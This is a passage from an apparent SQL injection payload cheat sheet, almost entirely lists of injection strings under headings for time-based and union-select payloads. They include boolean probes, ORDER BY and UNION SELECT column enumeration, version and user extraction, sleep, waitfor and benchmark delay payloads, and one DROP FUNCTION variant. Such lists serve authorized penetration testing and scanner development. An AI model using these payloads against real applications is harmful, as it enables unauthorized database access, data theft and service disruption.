188 | AS INJECTX WHERE 1=1 AND 1=1#
189 | AS INJECTX WHERE 1=1 AND 1=0#
190 | AS INJECTX WHERE 1=1 AND 1=1--
191 | AS INJECTX WHERE 1=1 AND 1=0--
192 | WHERE 1=1 AND 1=1
193 | WHERE 1=1 AND 1=0
194 | WHERE 1=1 AND 1=1#
195 | WHERE 1=1 AND 1=0#
196 | WHERE 1=1 AND 1=1--
197 | WHERE 1=1 AND 1=0--
198 | ORDER BY 1--
199 | ORDER BY 2--
200 | ORDER BY 3--
201 | ORDER BY 4--
202 | ORDER BY 5--
203 | ORDER BY 6--
204 | ORDER BY 7--
205 | ORDER BY 8--
206 | ORDER BY 9--
207 | ORDER BY 10--
208 | ORDER BY 11--
209 | ORDER BY 12--
210 | ORDER BY 13--
211 | ORDER BY 14--
212 | ORDER BY 15--
213 | ORDER BY 16--
214 | ORDER BY 17--
215 | ORDER BY 18--
216 | ORDER BY 19--
217 | ORDER BY 20--
218 | ORDER BY 21--
219 | ORDER BY 22--
220 | ORDER BY 23--
221 | ORDER BY 24--
222 | ORDER BY 25--
223 | ORDER BY 26--
224 | ORDER BY 27--
225 | ORDER BY 28--
226 | ORDER BY 29--
227 | ORDER BY 30--
228 | ORDER BY 31337--
229 | ORDER BY 1#
230 | ORDER BY 2#
231 | ORDER BY 3#
232 | ORDER BY 4#
233 | ORDER BY 5#
234 | ORDER BY 6#
235 | ORDER BY 7#
236 | ORDER BY 8#
237 | ORDER BY 9#
238 | ORDER BY 10#
239 | ORDER BY 11#
240 | ORDER BY 12#
241 | ORDER BY 13#
242 | ORDER BY 14#
243 | ORDER BY 15#
244 | ORDER BY 16#
245 | ORDER BY 17#
246 | ORDER BY 18#
247 | ORDER BY 19#
248 | ORDER BY 20#
249 | ORDER BY 21#
250 | ORDER BY 22#
251 | ORDER BY 23#
252 | ORDER BY 24#
253 | ORDER BY 25#
254 | ORDER BY 26#
255 | ORDER BY 27#
256 | ORDER BY 28#
257 | ORDER BY 29#
258 | ORDER BY 30#
259 | ORDER BY 31337#
260 | ORDER BY 1
261 | ORDER BY 2
262 | ORDER BY 3
263 | ORDER BY 4
264 | ORDER BY 5
265 | ORDER BY 6
266 | ORDER BY 7
267 | ORDER BY 8
268 | ORDER BY 9
269 | ORDER BY 10
270 | ORDER BY 11
271 | ORDER BY 12
272 | ORDER BY 13
273 | ORDER BY 14
274 | ORDER BY 15
275 | ORDER BY 16
276 | ORDER BY 17
277 | ORDER BY 18
278 | ORDER BY 19
279 | ORDER BY 20
280 | ORDER BY 21
281 | ORDER BY 22
282 | ORDER BY 23
283 | ORDER BY 24
284 | ORDER BY 25
285 | ORDER BY 26
286 | ORDER BY 27
287 | ORDER BY 28
288 | ORDER BY 29
289 | ORDER BY 30
290 | ORDER BY 31337
291 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
292 | RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
293 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
294 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
295 | %' AND 8310=8310 AND '%'='
296 | %' AND 8310=8311 AND '%'='
297 | and (select substring(@@version,1,1))='X'
298 | and (select substring(@@version,1,1))='M'
299 | and (select substring(@@version,2,1))='i'
300 | and (select substring(@@version,2,1))='y'
301 | and (select substring(@@version,3,1))='c'
302 | and (select substring(@@version,3,1))='S'
303 | and (select substring(@@version,3,1))='X'
304 | ```
305 |
306 | #### Generic Time Based SQL Injection Payloads
307 |
308 | ```
309 | # from wapiti
310 | sleep(5)#
311 | 1 or sleep(5)#
312 | " or sleep(5)#
313 | ' or sleep(5)#
314 | " or sleep(5)="
315 | ' or sleep(5)='
316 | 1) or sleep(5)#
317 | ") or sleep(5)="
318 | ') or sleep(5)='
319 | 1)) or sleep(5)#
320 | ")) or sleep(5)="
321 | ')) or sleep(5)='
322 | ;waitfor delay '0:0:5'--
323 | );waitfor delay '0:0:5'--
324 | ';waitfor delay '0:0:5'--
325 | ";waitfor delay '0:0:5'--
326 | ');waitfor delay '0:0:5'--
327 | ");waitfor delay '0:0:5'--
328 | ));waitfor delay '0:0:5'--
329 | '));waitfor delay '0:0:5'--
330 | "));waitfor delay '0:0:5'--
331 | benchmark(10000000,MD5(1))#
332 | 1 or benchmark(10000000,MD5(1))#
333 | " or benchmark(10000000,MD5(1))#
334 | ' or benchmark(10000000,MD5(1))#
335 | 1) or benchmark(10000000,MD5(1))#
336 | ") or benchmark(10000000,MD5(1))#
337 | ') or benchmark(10000000,MD5(1))#
338 | 1)) or benchmark(10000000,MD5(1))#
339 | ")) or benchmark(10000000,MD5(1))#
340 | ')) or benchmark(10000000,MD5(1))#
341 | pg_sleep(5)--
342 | 1 or pg_sleep(5)--
343 | " or pg_sleep(5)--
344 | ' or pg_sleep(5)--
345 | 1) or pg_sleep(5)--
346 | ") or pg_sleep(5)--
347 | ') or pg_sleep(5)--
348 | 1)) or pg_sleep(5)--
349 | ")) or pg_sleep(5)--
350 | ')) or pg_sleep(5)--
351 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
352 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
353 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
354 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
355 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
356 | SLEEP(5)#
357 | SLEEP(5)--
358 | SLEEP(5)="
359 | SLEEP(5)='
360 | or SLEEP(5)
361 | or SLEEP(5)#
362 | or SLEEP(5)--
363 | or SLEEP(5)="
364 | or SLEEP(5)='
365 | waitfor delay '00:00:05'
366 | waitfor delay '00:00:05'--
367 | waitfor delay '00:00:05'#
368 | benchmark(50000000,MD5(1))
369 | benchmark(50000000,MD5(1))--
370 | benchmark(50000000,MD5(1))#
371 | or benchmark(50000000,MD5(1))
372 | or benchmark(50000000,MD5(1))--
373 | or benchmark(50000000,MD5(1))#
374 | pg_SLEEP(5)
375 | pg_SLEEP(5)--
376 | pg_SLEEP(5)#
377 | or pg_SLEEP(5)
378 | or pg_SLEEP(5)--
379 | or pg_SLEEP(5)#
380 | '\"
381 | AnD SLEEP(5)
382 | AnD SLEEP(5)--
383 | AnD SLEEP(5)#
384 | &&SLEEP(5)
385 | &&SLEEP(5)--
386 | &&SLEEP(5)#
387 | ' AnD SLEEP(5) ANd '1
388 | '&&SLEEP(5)&&'1
389 | ORDER BY SLEEP(5)
390 | ORDER BY SLEEP(5)--
391 | ORDER BY SLEEP(5)#
392 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
393 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
394 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
395 | +benchmark(3200,SHA1(1))+'
396 | + SLEEP(10) + '
397 | RANDOMBLOB(500000000/2)
398 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
399 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
400 | RANDOMBLOB(1000000000/2)
401 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
402 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
403 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
404 | ```
405 |
406 | #### Generic Union Select Payloads
407 |
408 | ```
409 | ORDER BY SLEEP(5)
410 | ORDER BY 1,SLEEP(5)
411 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
412 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
413 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
414 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
415 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
416 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
417 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
418 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
419 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
420 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
421 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
422 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
423 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
424 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
425 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
426 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
427 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
428 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
429 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
430 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
431 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
432 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
433 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
434 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
435 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
436 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
437 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
438 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
439 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
440 | ORDER BY SLEEP(5)#
441 | ORDER BY 1,SLEEP(5)#
442 | ORDER BY 1,SLEEP(5),3#
443 | ORDER BY 1,SLEEP(5),3,4#
444 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
445 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
446 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
447 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
448 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
449 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
450 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
451 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
452 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
453 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
454 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
455 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
456 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
457 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
458 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
459 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
460 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
461 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
462 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
463 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
464 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
465 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
466 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
467 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
468 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
469 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
470 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
471 | ORDER BY SLEEP(5)--
472 | ORDER BY 1,SLEEP(5)--
473 | ORDER BY 1,SLEEP(5),3--
474 | ORDER BY 1,SLEEP(5),3,4--
475 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
476 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
477 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
478 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
479 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
480 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
481 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
482 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
483 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
484 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
485 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
486 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
487 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
488 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
489 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
490 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
491 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
492 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
493 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
494 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
495 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
496 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
497 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
498 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
499 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
500 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
501 | ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
502 | UNION ALL SELECT 1
503 | UNION ALL SELECT 1,2
504 | UNION ALL SELECT 1,2,3
505 | UNION ALL SELECT 1,2,3,4
506 | UNION ALL SELECT 1,2,3,4,5
507 | UNION ALL SELECT 1,2,3,4,5,6
508 | UNION ALL SELECT 1,2,3,4,5,6,7
509 | UNION ALL SELECT 1,2,3,4,5,6,7,8
510 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9
511 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
512 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
513 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
514 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
515 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
516 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
517 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
518 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
519 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
520 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
521 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
522 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
523 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
524 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
525 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
526 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
527 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
528 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
529 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
530 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
531 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
532 | UNION ALL SELECT 1#
533 | UNION ALL SELECT 1,2#
534 | UNION ALL SELECT 1,2,3#
535 | UNION ALL SELECT 1,2,3,4#
536 | UNION ALL SELECT 1,2,3,4,5#
537 | UNION ALL SELECT 1,2,3,4,5,6#
538 | UNION ALL SELECT 1,2,3,4,5,6,7#
539 | UNION ALL SELECT 1,2,3,4,5,6,7,8#
540 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
541 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
542 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
543 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
544 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
545 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
546 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
547 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
548 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
549 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
550 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
551 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
552 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
553 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
554 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
555 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
556 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
557 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
558 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
559 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
560 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
561 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
562 | UNION ALL SELECT 1--
563 | UNION ALL SELECT 1,2--
564 | UNION ALL SELECT 1,2,3--
565 | UNION ALL SELECT 1,2,3,4--
566 | UNION ALL SELECT 1,2,3,4,5--
567 | UNION ALL SELECT 1,2,3,4,5,6--
568 | UNION ALL SELECT 1,2,3,4,5,6,7--
569 | UNION ALL SELECT 1,2,3,4,5,6,7,8--
570 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
571 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
572 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
573 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
574 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
575 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
576 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
577 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
578 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
579 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
580 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
581 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
582 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
583 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
584 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
585 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
586 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
587 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
588 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
589 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
590 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
591 | UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
592 | UNION SELECT @@VERSION,SLEEP(5),3
593 | UNION SELECT @@VERSION,SLEEP(5),USER(),4
594 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
595 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
596 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
597 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
598 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
599 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
600 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
601 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
602 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
603 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
604 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
605 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
606 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
607 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
608 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
609 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
610 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
